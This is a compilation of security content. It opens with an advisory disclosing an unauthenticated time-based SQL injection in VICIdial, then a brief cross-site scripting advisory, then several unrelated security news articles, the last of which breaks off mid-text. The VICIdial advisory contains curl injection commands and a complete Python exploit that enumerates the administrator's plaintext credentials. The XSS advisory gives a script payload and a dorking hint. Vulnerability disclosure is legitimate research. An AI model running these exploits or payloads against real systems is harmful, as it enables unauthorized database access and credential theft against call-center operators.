An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial version 2.14-917a to enumerate database records. By default, VICIdial stores plaintext credentials within the database.

    KL-001-2024-011: VICIdial Unauthenticated SQL InjectionTitle: VICIdial Unauthenticated SQL InjectionAdvisory ID: KL-001-2024-011Publication Date: 2024-09-10Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt1. Vulnerability Details      Affected Vendor: VICIdial      Affected Product: VICIdial      Affected Version: 2.14-917a      Platform: GNU/Linux      CWE Classification: CWE-89: Improper Neutralization of Special                          Elements used in an SQL Command                          ('SQL Injection')      CVE ID: CVE-2024-85032. Vulnerability Description      An unauthenticated attacker can leverage a time-based SQL      injection vulnerability in VICIdial to enumerate database      records. By default, VICIdial stores plaintext credentials      within the database.3. Technical Description      VICIdial is an open-source contact center suite, mainly used      by call centers. The "vicidial.com" website boasts over 14,000      registered installations. There is a public SVN repository to      access the source code, as well as an ISO that can be used to      install the software. The ISO was used in a virtual machine      for testing purposes.      When performing SQL queries, VICIdial does not use prepared      statements, but instead uses the "preg_replace" PHP function      to remove problematic characters in user-controlled input      before interpolating the variable into a SQL query. This      is largely an effective solution, as regular expressions      like "/[^-_0-9a-zA-Z]/" are passed to "preg_replace", which      essentially limits input to the characters shown in the pattern      (letters, numbers, underscores, and hyphens).      However, these scripts do not utilize a shared PHP file      for performing sanitization uniformly. Instead, each script      individually implements the "preg_replace" function, leading      to inconsistencies in which patterns are used and where they      are applied.      For example, providing credentials via the "Authorization"      request header using the "Basic" scheme, most PHP scripts      sanitize the username value with the following line:     $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/','',$PHP_AUTH_USER);      However, the "VERM_AJAX_functions.php" PHP script does not      perform any sanitization before inserting the username into      a SQL "INSERT" statement:     $PHP_AUTH_USER=$_SERVER['PHP_AUTH_USER'];     $PHP_AUTH_PW=$_SERVER['PHP_AUTH_PW'];     ...     if ($function=="log_custom_report")       {       $rpt_log_stmt="insert ignore into         verm_custom_report_holder(user,         report_name, report_parameters)         values('$PHP_AUTH_USER', '$custom_report_name',         '$LOGhttp_referer') ON DUPLICATE KEY         UPDATE report_name='$custom_report_name',         report_parameters='$custom_report_vars'";       $rpt_log_rslt=mysql_to_mysqli($rpt_log_stmt, $link);       return mysqli_affected_rows($rpt_log_rslt);       }      Since "VERM_AJAX_functions.php" can be accessed without      authentication, this creates a straight forward unauthenticated      SQL injection vulnerability. While the page response cannot      be manipulated by the execution of the query, delays in the      page response can be observed when using SQL functions such as      "sleep()", enabling the enumeration of database values using      time-based SQL injection:     $ time curl -u "foo:bar" \  http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m0.019s   <--- (normal response time)     user    0m0.004s     sys    0m0.008s     $ time curl -u "','',sleep(5));#:bar" \  http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m5.023s   <--- (5-second delay in response time)     user    0m0.003s     sys    0m0.008s      This observable difference can be used to craft queries that      sleep under specific conditions, allowing an attacker to ask      "Yes or No" questions. In the following example, the "sleep()"      function is called only if the provided string matches the      database version:     $ time curl -u \         "','',IF(@@version='korelogic',sleep(5),NULL));#:bar" \  http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m0.024s   <--- (normal response time)     user    0m0.006s     sys    0m0.003s     $ time curl -u \  "','',IF(@@version='10.6.14-MariaDB-log',sleep(5),NULL));#:bar" \  http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m5.019s   <--- (5-second delay in response time)     user    0m0.004s     sys    0m0.008s4. Mitigation and Remediation Recommendation      This issue has been remediated in the public svn/trunk codebase,      as of revision 3848 committed 2024-07-08.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2024-07-05 : KoreLogic requests security contact from                   support@vicidial.com.      2024-07-08 : KoreLogic reports vulnerability details to VICIdial                   contact.      2024-07-08 : VICIdial notifies KoreLogic that the issue has been                   remediated with revision 3848 in the public                   Subversion repository.      2024-07-11 : KoreLogic confirms this vulnerability has been                   remediated. KoreLogic asks VICIdial if it is                   appropriate to publicly disclose the vulnerability                   details at this time.      2024-07-11 : VICIdial requests four weeks of embargo in order to                   upgrade supported customers.      2024-08-05 : KoreLogic asks VICIdial if it is appropriate to                   publicly disclose the vulnerability details at                   this time.      2024-08-09 : VICIdial requests an additional two weeks of                   embargo.      2024-09-10 : KoreLogic public disclosure.7. Proof of Concept      The following script can be used to automate the exploitation process and      enumerate the results of provided queries:          $ time python unauth_sqli.py -rh vicidial.zz -rp 443 -q 'SELECT @@version'          [+] Target appears vulnerable to time-based SQL injection          [~] Executing SQL: SELECT @@version          [~] 1          [~] 10          [~] 10.          [~] 10.6          [~] 10.6.          [~] 10.6.1          [~] 10.6.14          [~] 10.6.14-          [~] 10.6.14-M          [~] 10.6.14-Ma          [~] 10.6.14-Mar          [~] 10.6.14-Mari          [~] 10.6.14-Maria          [~] 10.6.14-MariaD          [~] 10.6.14-MariaDB          [~] 10.6.14-MariaDB-          [~] 10.6.14-MariaDB-l          [~] 10.6.14-MariaDB-lo          [~] 10.6.14-MariaDB-log          real    0m6.727s          user    0m0.425s          sys    0m0.020s      ##############################      ##      unauth_sqli.py      ##      ##############################      import string      import random      import urllib3      import argparse      import requests      from base64 import b64encodeurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)      class Exploit:          def __init__(self, rhost, rport, proxy=None):              """              This 'sleep' duration is derived by the average response time              multiplied by this value. A server with an average response time              of 10ms is given a 'sleep' duration of 300ms. Tune as needed.              """              self.SLEEP_MULTIPLIER = 30              self.REQUEST_HEADERS = {'User-Agent': 'KoreLogic'}              self.ALLOWED_SCHEMES = ['http', 'https']              if proxy:                  self.REQUEST_PROXIES = {                      'http':  proxy,                      'https': proxy                  }              else:                  self.REQUEST_PROXIES = {}              self.TARGET_IP   = rhost              self.TARGET_PORT = rport              self.VICIDIAL_FINGERPRINT = 'Please Hold while I redirect you!'              self.RANDOM_CHARSET = string.ascii_uppercase + string.digits          # returns a URI with 'http' or 'https'          def determine_target_uri(self):              for scheme in self.ALLOWED_SCHEMES:                  target_uri = f'{scheme}://{self.TARGET_IP}:{self.TARGET_PORT}'                  try:                      response = requests.get(target_uri, headers=self.REQUEST_HEADERS, verify=False)                      if self.VICIDIAL_FINGERPRINT in response.text:                          return target_uri                  except:                      pass          # returns a session object with custom proxies/headers if supplied          def build_requests_session(self):              self.base_uri = self.determine_target_uri()              session = requests.Session()              session.proxies = self.REQUEST_PROXIES              session.verify  = False              return session          # returns a random string of a given length          def random(self, length):              return ''.join(random.choice(self.RANDOM_CHARSET) for _ in range(length))          # returns a timedelta representing the response time of an injected SQL query          def time_sql_query(self, query, session):              username    = f"goolicker', '', ({query}));# "              credentials = f'{username}:password'              credentials_base64 = b64encode(credentials.encode()).decode()              auth_header = f'Basic {credentials_base64}'              target_uri = f'{self.base_uri}/VERM/VERM_AJAX_functions.php'              request_params  = {'function': 'log_custom_report', self.random(5): self.random(5)}              request_headers = {**self.REQUEST_HEADERS, 'Authorization': auth_header}              response = session.get(target_uri, params=request_params, headers=request_headers)              return response.elapsed          # returns a boolean if time-based SQL injection is possible, additionally          # sets the best 'sleep' duration based on response times          def is_vulnerable(self, session, baseline_iterations=5):              # determine average baseline response time              zero_sleep_query = f'SELECT (NULL)'              total_baseline_time = 0              for _ in range(baseline_iterations):                  execution_time = self.time_sql_query(zero_sleep_query, session)                  total_baseline_time += execution_time.total_seconds()              average_baseline_response_time = total_baseline_time / baseline_iterations              self.sql_baseline_time = average_baseline_response_time              # determine if injected sleep query impacts response time              sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2)              sleep_query  = f'SELECT (sleep({sleep_length}))'              execution_time = self.time_sql_query(sleep_query, session)              if execution_time.total_seconds() >= sleep_length:                  self.sql_sleep_length = sleep_length                  return True              else:                  return False          # determine if a character at a specific indice of a query result returns a          # boolean 'true' when compared to a given character using the supplied operator          def check_indice_of_query_result(self, session, query, indice, operator, ordinal):              parent_query    = f'SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)'              execution_time  = self.time_sql_query(parent_query, session)              return execution_time.total_seconds() >= (self.sql_baseline_time * self.SLEEP_MULTIPLIER)          def enumerate_sql_query(self, session, query='SELECT @@version', charset=string.printable):              # convert charset to ordinals              all_characters     = sorted([ord(char) for char in charset])              reduced_characters = all_characters              # use a binary search and enumerate query results              result = ''              indice = 1              indice_could_be_null = True              while True:                  """                  we check if the value is NULL once per indice                  to determine when a string ends. this adds one                  request per indice, but since every boolean 'true'                  results in a delay this is faster than counting                  the length of the string before enumrating.                  """                  if indice_could_be_null:                      if self.check_indice_of_query_result(session, query, indice, '=', '0'):                          break                      else:                          indice_could_be_null = False                  # enumerate each character of query result with a binary search                  middle_indice  = len(reduced_characters) // 2                  middle_ordinal = reduced_characters[middle_indice]                  if self.check_indice_of_query_result(session, query, indice, '<=', middle_ordinal):                      if self.check_indice_of_query_result(session, query, indice, '=', middle_ordinal):                          reduced_characters = all_characters                          result += chr(middle_ordinal)                          indice += 1                          indice_could_be_null = True                          print(f'[~] {result}')                      else:                          reduced_characters = reduced_characters[:middle_indice]                  else:                      reduced_characters = reduced_characters[middle_indice:]              return result          # returns administrator username and password by          # exploiting time-based SQL injection.          def extract_admin_credentials(self, session):              print('[~] Enumerating administrator credentials')              username_charset = string.ascii_letters + string.digits              admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1"              admin_username = self.enumerate_sql_query(session, admin_username_query, username_charset)              print(f'[+] Username: {admin_username}')              password_charset = string.ascii_letters + string.digits + '-.+/=_'              admin_password_query = f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1"              admin_password = self.enumerate_sql_query(session, admin_password_query, password_charset)              print(f'[+] Password: {admin_password}')              return admin_username, admin_password          # injects SQL queries and enumerates results if instance is vulnerable          def exploit(self, custom_query=None):              session = self.build_requests_session()              is_vulnerable = self.is_vulnerable(session)              if is_vulnerable:                  print('[+] Target appears vulnerable to time-based SQL injection')              else:                  print('[-] Failed to perform time-based SQL injection')                  return              if custom_query:                  print(f'[~] Executing SQL: {custom_query}')                  self.enumerate_sql_query(session, custom_query)              else:                  self.extract_admin_credentials(session)      if __name__ == '__main__':          argparser = argparse.ArgumentParser(description='Exploit for CVE-2024-XXXXX: Unauthenticated SQLi')          required  = argparser.add_argument_group('Required Arguments')          optional  = argparser.add_argument_group('Optional Arguments')          required.add_argument('-rh', '--rhost', required=True, help='Vicidial Server IP address')          required.add_argument('-rp', '--rport', required=True, help='Vicidial Server port number')          optional.add_argument('-q',  '--query', required=False, help='Custom SQL query to execute',                default=None)          optional.add_argument('-p',  '--proxy', required=False, help='HTTP[S] proxy to use for outbound requests', default=None)          arguments = argparser.parse_args()          exploit = Exploit(              rhost = arguments.rhost,              rport = arguments.rport,              proxy = arguments.proxy          )          exploit.exploit(custom_query=arguments.query)The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

VICIdial 2.14-917a SQL Injection

Passion Responsive Blogging version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Passion Responsive Blogging 1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/responsive-blog-site-in-php-with-source-code/                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : single.php?id=12'"()%26%25<acx><ScRiPt >prompt(982273)</ScRiPt>[+] https://127.0.0.1com/bmacblog/single.php?id=12%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(982273)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Passion Responsive Blogging 1.0 Cross Site Scripting

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they're blobbing together to create a widening attack surface.

Source: Agencja Fotograficzna Caro via Alamy Stock Photo

The exploding demand for remote access into today's industrial control systems (ICS) and operational technology (OT) systems has created a nebulous, Internet-connected attack surface that's too attractive for cyberattackers to ignore. And cleanup is not going to be a simple affair.

Far too many ICS networks are being accessed by employees, partners, suppliers, and customers using a slapped-together mousetrap of tools, leaving these environments woefully exposed while connected to the Internet, according to researchers.

In a new analysis, Claroty's Team82 looked at 50,000 individual remote access-enabled devices running on industrial networks with dedicated OT hardware, and found 55% to have at least four remote access tools (RATs) in their environments. A full third (33%) reported using six or more RATs. Some organizations reported using up to 16 different of them.

Industries represented in the examples examined by the Team82 researchers included pharmaceuticals, consumer goods, food and beverage, automotive, oil and gas, mining, and manufacturing — many of which are considered critical infrastructure sectors.

"Within critical infrastructure, there is sometimes a bigger physical risk associated with a breach, depending on the jeopardized device," says Tal Laufer, Claroty's vice president of products, secure access. "That being said, all organizations with this type of tool sprawl are at risk, since it can create security gaps in their networks for threat actors to exploit."

Making matters even more complicated for cybersecurity teams, the Team82 report found that 79% of the organizations they surveyed have more than two remote access management tools in their environment that don't meet basic enterprise-grade security standards.

"Most of these tools lack the session recording, auditing, and role-based access controls that are necessary to properly defend an OT environment," the Team82 report said. "Some lack basic security features such as multi-factor authentication (MFA) options, or have been discontinued by their respective vendors and no longer receive feature or security updates."

**Cyberattackers Notice Sprawling OT Remote Access Attack Surface**

Adversaries are already well aware of the malicious possibilities that these remote access tools unlock — and have been for several years.

Laufer notes that several massive breaches in recent years have been the result of misconfigured remote access tools, including Colonial Pipeline in 2021 and Change Healthcare earlier this year.

As far back as 2020, analysts at Kaspersky warned about the risk of cyberattacks against remote access tools like TeamViewer and RMS to breach ICS environments. And in January 2023, CISA joined with the NSA to issue a warning that adversaries were launching widespread campaigns against remote management systems like AnyDesk to breach federal agencies.

Those warnings have played out: A threat actor was discovered attempting to drop XMRing cryptominer malware using TeamViewer in May 2023. Likewise, the remote access tool TeamViewer was targeted in failed attempts to compromise systems by LockBit 3.0 ransomware group in early 2024. Similarly, remote access tool production systems were compromised at AnyDesk last February, forcing the vendor to revoke all of its security clearances and reset all Web portal passwords.

Despite these warnings, ICS/OT operators are in a particularly tough spot without a clear path toward protecting themselves. The Team82 findings demonstrate how the sheer number of these tools can easily pile up within an environment, creating an ever-creeping blob of remote access surface area ripe for adversaries to probe for success. As the report detailed, each tool brings along with it its own supply chain weaknesses, often including a lack of basic, best-practice security features like MFA, auditing, and session recording.

Compounding the issue is a basic lack of monitoring, detection, and policy control tooling that works across disparate remote access systems, leaving them open to misconfigurations, as messy policy and control management, the report added.

The report added that managing all these various RATs, and the hardware behind them, is an expensive operational proposition.

**OT Remote Access Cleanup**

Unsurprisingly, the first step on the path to securing remote access for ICS/OT networks is to get a full inventory of the tools that provide access to OT assets, according to the report.

"A critical first step is ensuring you have complete visibility into your organization’s OT network to understand how many and which solutions are providing access to OT assets and industrial control systems (ICS)," Laufer explains.

Next, those solutions that don't meet basic enterprise cybersecurity requirements need to go — pronto.

"From there, engineers and assets managers need to actively eliminate or minimize the use of low-security remote access tools in the OT environment — especially taking into consideration those with known vulnerabilities or those lacking essential security features such as MFA," the researcher stresses.

It's also crucial to develop and require baseline security standards across the organization's supply chain. "Beyond this, security teams should also govern the use of remote access tools connected to OT and ICS," Laufer says. "This can help with alignment of security requirements and expansion of those requirements as needed throughout third parties within the supply chain."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

Remote Access Sprawl Strains Industrial OT Network Security

In the "PixHell" attack, sound waves generated by pixels on a screen can transmit information across seemingly impenetrable air gaps.

Source: Miscellaneoustock via Alamy Stock Photo

A newly devised covert channel attack method could undermine diligently devised air gaps at highly sensitive organizations.

In industrial control systems security, the term "air gap" is contested. It typically describes a total physical separation between networks — a literal gap through which no Wi-Fi signals, wires, etc., can pass. The most critical military, government, and industrial sites use air gaps to prevent Internet-based cyber threats from penetrating the kinds of networks that protect state secrets and human lives.

But any medium capable of transmitting information can, in theory, be weaponized to transmit the bad kind. Mordechai Guri of Israel's Ben-Gurion University has long researched ways of crossing air gaps with sound waves: via computer fans, hard disk drives, CD/DVD drives, and more. His latest attack scenario, "Pixhell," enables data theft using sounds produced by specially generated, rapidly shifting bitmap patterns on an LCD screen.

**How Pixhell Works**

It's midnight, and everyone working at the top secret intelligence facility has long gone home for the night, when all of a sudden a computer screen flashes with what appears to be random noise, as if it's missing a signal. It isn't missing a signal — the apparent noise is the signal.  

Pixhell only works if an attacker can infect or control at least one device on each side of an air gap.

Air gaps typically connect critical networks with less critical networks, so the latter half of that job might be achieved by an Internet-based attack, while the former will require more stringent measures. Still, a machine behind an air gap can be infected in any number of ways: via supply chain compromise, a removable drive in the hands of a malicious or unwitting insider, or assorted other options.

Then, with no other obvious means of communicating — not Wi-Fi, Bluetooth, a speaker, or anything else — a computer can be made to transmit information over an air gap via the sounds generated by its screen.

Simplified, LCD screens have capacitors — which store and release electrical charge — and inductors — which help manage the voltage to those capacitors. While they're working, these components generate the faintest of high-pitched frequencies, inaudible to the human ear.

However, "Speakers and microphones generally have a frequency range that is broader than human hearing," explains Andrew Ginter, vice president of industrial security at Waterfall Security Solutions. "The high end of the frequency range is where you can encode the greatest amount of information — the largest number of bits per second — and it's ultrasound. Dogs might freak out in the room, but humans can't hear it."

In experiments, the Pixhell malware manipulated pixels on a screen in such a way as to cause its inductors and capacitors to vibrate at specific frequencies. In so doing, they generated sound waves translating stolen, encoded data to the machine on the other side of an air gap, with varying fidelity at distances of up to two and a half meters. As Ginter puts it, "An attacker can send information from either computer to the other's microphone, and you can be sitting in the room and not realize information is being communicated."

**The Wide World of Covert Channel Attacks**

Besides acoustics, there are any number of other, equally creative means to carry out covert channel attacks in theory.

"It's been reported that with sufficient effort, you can use Ethernet wiring as software-defined radio transmitters and receivers," Ginter notes. Some 20 years ago, 56-kilobit-per-second modems had an LED on the front so users could see if their data was moving. Ginter says you could turn the LED on when there was a one bit being transmitted, or off when it was a zero bit. "And it turned out that the LED was extremely responsive — so responsive that if you had a fast enough camera or detector, you could actually detect every bit that was being sent through the modem by watching the LED," he adds. 

Countless other fun examples can be found in the annals of computer research archives. "Some computers have the ability to do detailed measurements on the voltage that's coming into the battery. And what that means is that if you have two computers plugged into the same circuit, even if they're using different outlets, one computer can consume more power briefly and less power a fraction of a second later, and the other one can detect these very tiny changes in voltage, so they can signal to each other that way. Even though they're electrically connected to different networks, they're both connected to the same power," he explains.

**What the Best Air Gaps Look Like**

For the overwhelming majority of organizations, a physical air gap is sufficient to protect against even high-level adversaries, who aren't likely to pull off Pixhell-style attacks.

Those few most sensitive sites on the planet that have to worry about covert channel attacks — spy agencies, military headquarters, power plants — have already dedicated significant time and resources to building not just air gaps, but air gaps that make these scenarios impractical.

"At some extremely sensitive OT sites, they will have all of the OT equipment in one server room, and they'll have the IT equipment in another server room down the hall. And the only connection between the server rooms is a single fiber-optic connection that is a unidirectional gateway from OT to IT," Ginter explains.

Past that, he adds, the greater the distance between communicating computers, the more difficult it is to exploit covert channels. "If it's an electrical \[channel you're worried about\], you've got electrical noise between rooms. If it's audible, there are closed doors in the way. If it's temperature, you can heat up the room in a region very slightly \[at intervals\], so there's so much thermal noise that it becomes impractical to send any information out." The operative idea is signal-to-noise ratio (SNR): How much noise does one have to generate to make a covert channel attack impractical?

Whether such science-fiction-level defenses are warranted will depend on the organization at risk. "Some of the countermeasures were given for scientific discussion, but they are less practical to deploy in real life," Guri says. As an example, he points out that acoustic jammers would stop Pixhall right in its tracks: "Such a noise jammer may work in countering the attack, but it will make the environment too noisy for people to work."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Air-Gapped Networks Vulnerable to Acoustic Attack via LCD Screens

An attack dubbed "WordDrone" that uses an old flaw to install a backdoor could be related to previously reported cyber incidents against Taiwan's military and satellite industrial supply chain.

Source: Ron Ardity via Alamy Stock Photo

Attackers are weaponizing an "ancient" version of Microsoft Word in a recent wave of attacks on Taiwanese drone makers that's delivering malware aimed at cyber espionage and disrupting the military- and satellite-related industrial supply chains.

Researchers from the Acronis Threat Research Unit have discovered an attack they've dubbed "WordDrone" that uses a dynamic link library (DLL) side-loading technique common in the installation process of Microsoft Word, to install a persistent backdoor called ClientEndPoint on infected systems.

The Acronis team members discovered the unusual attack vector when they investigated a customer escalation from Taiwan "about a strangely behaving process of an ancient version of Microsoft Word," they wrote in a blog post published Sept. 10.

"Three files were brought to the system: a legitimate copy of Winword 2010, a signed wwlib.dll file, and a file with a random name and file extension," they wrote in the post. "Microsoft Word was used to side load the malicious 'wwlib' DLL, which acts as a loader for the actual payload, the one residing inside the encrypted file with a random name."

They eventually found similar two-stage attack scenarios across multiple environments between April and July this year. The first stage of the attacks focuses on Windows desktop machines, while the second stage sees attackers trying to move over to Windows servers, the researchers said.

**Similarities to "TIDrone" Campaign**

It's unclear if the attack vector is related to a similar wave of cyber incidents against Taiwanese drone makers by a threat actor dubbed "TIDrone" reported by researchers at Trend Micro. That actor, linked to other Chinese-speaking threat groups, uses enterprise resource planning (ERP) software or remote desktop tools to deploy proprietary malware.

Similarly, the WordDrone attack also appears to have an ERP component, the researchers said. While they couldn't find "definitive evidence about how attackers were gaining initial access," the first appearance of the malicious files in the attack was inside the folder of a popular Taiwanese ERP software called Digiwin.

"Upon further investigation, we found multiple components of Digiwin … being deployed in the target environments," the researchers wrote. Moreover, some of Digiwin's components contained known vulnerabilities like CVE-2024-40521, a remote code execution (RCE) flaw with a CVSS score of 8.8.

"Based on all the information collected, we believe that there is high probability of exploitation or a supply chain attack being involved with the ERP software in question," the researchers noted.

**Targeting a Side-Loading Flaw**

The attack leverages a side-loading vulnerability in an old version of Winword (v14.0.4762.1000) allowing attackers to use it to load a DLL that has a name matching the original supplied by Microsoft.

"In the very same directory where Winword was located, we could see only two additional files, a ... DLL called wwlib.dll, which is normally part of a standard Microsoft Office installation package — this time having an unusually small size — and another file called 'gimaqkwo.iqq' which already looked suspicious," the researchers explained.

Upon further inspection, the wwlib library turned out to be acting as a loader with the sole purpose of reading the main payload that is stored in the encrypted "gimaqkwo.iqq" file in the same directory, they said. The file name of the payload — the ClientEndPoint backdoor — is stored in an encrypted form in the loader.

The backdoor has functionality typical to this type of malware, including the ability to listen in on user sessions, send and receive commands from the attacker-controlled command and control (C2), and exfiltrate data and send it back to the C2. It also has a proxy configuration mode in which one infected host can receive data and commands from another infected host on the local network while only one of them is in direct communication with the C2.

**Why Target Taiwanese Drone Makers?**

The fact that two separate security research teams have been investigating a spate of cyberattacks against Taiwanese drone makers brings up the question of motive on the part of attackers, which the Acronis team attempted to address.

Drone manufacturing has increased remarkably in Taiwan since 2022, with significant financial backing from the government, the researchers noted. There currently are about a dozen Taiwanese companies in the space  — often providing components for original equipment manufacturers (OEMs) — and even more if the country's global aerospace industry is taken into consideration, they said.

This investment in drone manufacturing and the considerable technological prowess of Taiwan, as well as its position as a US ally, "make them a prime target for adversaries interested in military espionage or supply chain attacks," the researchers observed.

"The extreme growth of the drone industry in the past decade also had an unfortunate side effect — even consumer models are used for military purposes now," they wrote in the post.

The research team shared their intelligence with Taiwan's appropriate cybersecurity authorities and included a list of indicators of compromise (IoCs) in the blog post. As drone makers of all sizes could be targeted by WordDrone attacks, defenders should be mindful of any suspicious activity, especially as it relates to older versions of Microsoft Word that might be present in their environment. Small businesses in the sector in particular should be mindful and shore up defenses, the researchers wrote, "as traditional AV solutions are no longer efficient against the type of advanced threats they might face in the near future."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'Ancient' MSFT Word Bug Anchors Taiwanese Drone-Maker Attacks

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.
"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.
The activity has been assessed to be part of

Malware / Software Development

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.

"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.

The activity has been assessed to be part of an ongoing campaign dubbed VMConnect that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.

The use of job interviews as an infection vector has been adopted widely by North Korean threat actors, either approaching unsuspecting developers on sites such as LinkedIn or tricking them into downloading rogue packages as part of a purported skills test.

These packages, for their part, have been published directly on public repositories like npm and PyPI, or hosted on GitHub repositories under their control.

ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.

"The malicious code is present in both the \_\_init\_\_.py file and its corresponding compiled Python file (PYC) inside the \_\_pycache\_\_ directory of respective modules," Zanki said.

It's implemented in the form of a Base64-encoded string that obscures a downloader function that establishes contact with a command-and-control (C2) server in order to execute commands received as a response.

In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.

This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding "that ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system."

Some of the aforementioned tests claimed to be a technical interview for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors are impersonating legitimate companies in the sector to pull off the operation.

It's currently not clear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn, as recently also highlighted by Google-owned Mandiant.

"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.

The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).

Some of these attacks also entail the propagation of a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. The activity has been linked to a sub-cluster tracked as puNK-003, per S2W.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

Windows Security / Vulnerability

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.

The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.

The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -

*   **CVE-2024-38014** (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
*   **CVE-2024-38217** (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
*   **CVE-2024-38226** (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
*   **CVE-2024-43491** (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability

"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.

"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."

As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.

CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.

"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.

